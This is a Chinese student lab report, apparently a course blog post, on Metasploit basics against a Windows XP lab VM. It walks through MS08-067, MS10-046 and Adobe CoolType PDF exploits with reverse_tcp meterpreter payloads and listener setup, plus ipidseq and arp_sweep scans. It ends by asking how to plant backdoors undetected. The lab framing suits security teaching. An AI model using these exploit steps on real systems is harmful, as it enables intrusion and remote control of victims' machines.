2018-2019 2 20165210 《网络对抗技术》Exp5 MSF基础

2018-2019 2 20165210 《网络对抗技术》Exp5 MSF基础

实验内容:

  1. 一个主动攻击实践,如ms08_067(成功);
  2. 一个针对浏览器的攻击,如ms10_046(成功);
  3. 一个针对客户端的攻击,如Adobe(成功);
  4. 成功应用任何一个辅助模ipidseq(唯一)arp_sweep(成功)。

实验过程:

一、一个主动攻击实践,ms08_067。

靶机: windows XP SP3(English)(192.168.16.145)
攻击机:kali(192.168.16.143)
  • 输入msfconsole进入控制台,输入search ms08_067指令查询一下针对该漏洞可以运用的攻击模块,我们可以看到在攻击模块中确实存在这样一个漏洞
exploit/windows/smb/ms08_067_netapi
  • 我们就利用这个漏洞来进行攻击,输入
use exploit/windows/smb/ms08_067_netapi
  • 输入
show payloads

来查看一下,用什么样的payload来攻击

  • 输入
set payload generic/meterpreter_reverse_tcp

来设置相关参数。

  • 我们可以输入show options来查看哪些参数需要设置

  • 使用set LHOST 192.168.16.143和set LPORT 5210设置本机地址和端口,使用set RHOST 192.168.16.145设置耙机地址

  • 接着使用exploit指令开始攻击

  • 发现攻击成功输入dir显示所有文件

二、一个针对浏览器的攻击,ms10_046。

靶机: windows XP SP3(English)(192.168.16.145)
攻击机:kali(192.168.16.143)
  • 输入
search ms10_046 //查询该漏洞的路径

  • 输入
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
show payloads//漏洞相应的攻击载荷

  • 输入
set payload windows/meterpreter/reverse_tcp//设置攻击载荷的参数
set LHOST 192.168.16.143
set SRVHOST 192.168.16.143
set RHOST 192.168.16.145
exploit

  • 出现了一个URL链接入口http://192.168.16.143:80/,如图所示。

  • 在靶机中打开这个链接,弹出两个文件,打开任意一个文件。

  • 发现攻击机已经建立会话,输入sessions,输入
sessions -i 1

,打开session,成功

一个针对客户端的攻击,Adobe。

靶机: windows XP SP3(English)(192.168.16.145)
攻击机:kali(192.168.16.143)
  • 进入msfconsole
  • 输入
search adobe//查找与adobe有关的漏洞

  • 输入
use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.154.152
set LPORT 5210
set FILENAME 20165210666.pdf
exploit

  • 在图中所显示的路径找到文件,也可以在终端输入
cp /root/.msf4/local/20165210666.pdf ~

  • 将生成的文件20165210.pdf复制到靶机中。

  • 在攻击机中回到初始界面,开始监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.16.143
set LPORT 5210
exploit

  • 成功

四、成功应用任何一个辅助模块(ipidseq唯一)(arp_sweep):

我们可以使用命令msf > show auxiliary查看所有的辅助模块:
  • ipidseq唯一
  • 功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。
  • 先search ipidseq后选择相应模块,查看需要设置的参数

  • 设置相应的参数

  • exploit,扫描成功

  • arp_sweep
  • arp_sweep使用ARP请求枚举本地局域网络中的所有活跃主机进行扫描
  • 输入
use auxiliary/scanner/discovery/arp_sweep
  • 进入模块设置参数run扫描

基础问题回答

  • 用自己的话解释什么是exploit,payload,encode

exploit既可以看成是运载恶意代码的载体,也可以理解成利用漏洞进行攻击的通道;payload是攻击的具体武器,如后门等;encode用来编码,用于伪装。

实验中遇到的问题

  1. 在主动攻击实践中,我测试了许多靶机,比如win7,win2008,winxp pattacker。都失败了,只有这个winxp sp3 英文版成功了。
  2. 在进行一个针对客户端的攻击,Adobe,我发现创建的文件按那个目录根本找不到,只有将其用命令行拷到主文件上。
  3. 端口号是必须设置的吗?我看博客中有些同学设置了有些没设置。

实验的感受和体会

本次实验做了一天一夜,尤其是在这个虚拟机花费了很多的时间,最后才发现winxp sp3英文版的可以攻击,还有就是学会了MSF工具的一些常用指令,了解了它的六个模块的用法,掌握了如何在/usr/share/metasploit-framework/modules/exploits/路径下找到相应操作系统的相关漏洞,学会了运用一些辅助模块。

离实战还缺些什么技术或步骤

怎么才能安稳的把后门文件放到靶机中,不被发现,怎么解决库的更新。

posted @ 2019-04-20 17:13  lykkyl  阅读(237)  评论(0编辑  收藏  举报